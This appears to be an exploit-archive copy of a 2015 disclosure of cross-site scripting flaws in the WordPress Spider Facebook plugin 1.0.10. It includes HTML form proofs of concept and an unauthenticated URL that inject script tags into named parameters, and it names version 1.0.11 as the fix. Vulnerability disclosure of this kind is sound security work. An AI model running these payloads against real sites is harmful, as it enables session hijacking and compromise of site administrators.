Home / exploitsPDF  

WordPress Spider Facebook 1.0.10 Cross Site Scripting

Posted on 10 February 2015

Title: WordPress 'WordPress Facebook' plugin - XSS
Version: 1.0.10
Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej
Date: 2015/01/26
Download: https://wordpress.org/plugins/spider-facebook/
Contacted WordPress: 2015/01/26
==========================================================

## Description:
==========================================================
Spider Facebook is a WordPress integration tool for Facebook.It includes all the available Facebook social plugins and widgets to be added to your web

## XSS:
==========================================================
Some parameters are shown unsanitized, making XSS possible.

PoC:
Log in as admin an submit one of the following forms:
<form method="POST" action="http://[URL]/wp-admin/admin.php?page=Spider_Facebook_manage">
 <input type="text" name="asc_or_desc" value=""/><script>alert(1)</script>"><br />
 <input type="text" name="order_by" value=""/><script>alert(2)</script>"><br />
 <input type="text" name="page_number" value=""/><script>alert(3)</script>"><br />
 <input type="text" name="serch_or_not" value=""/><script>alert(4)</script>"><br />
 <input type="submit">
</form>

<form method="POST" action="http://[URL]/wp-admin/admin-ajax.php?action=selectpagesforfacebook&">
 <input type="text" name="search_events_by_title" value=""/><script>alert(1)</script>"><br />
 <input type="text" name="page_number" value=""/><script>alert(2)</script>"><br />
 <input type="text" name="serch_or_not" value=""/><script>alert(3)</script>"><br />
 <input type="text" name="asc_or_desc" value=""/><script>alert(5)</script>"><br />
 <input type="text" name="order_by" value=""/><script>alert(6)</script>"><br />
 <input type="submit">
</form>
Also works with this target url: http://[URL]/wp-admin/admin-ajax.php?action=selectpostsforfacebook&

<form method="POST" action="http://[URL]/wp-admin/admin.php?page=Spider_Facebook_manage">
 <input type="text" name="search_events_by_title" value=""/><script>alert(1)</script>"><br />
 <input type="text" name="serch_or_not" value="search" READONLY><br />
 <input type="submit">
</form>
Also works with http://[URL]/wp-admin/admin-ajax.php?action=selectpostsforfacebook& and http://[URL]/wp-admin/admin-ajax.php?action=selectpagesforfacebook&

You can also just visit the following URL (no login required):
http://[URL]/?task=registration&g_red=1&type=auto&appid=%22%3E%3C/iframe%3E%3Cscript%3Ealert%281%29%3C/script%3E

## Solution
==========================================================
Update to version 1.0.11

 

TOP

Malware :

Exploits :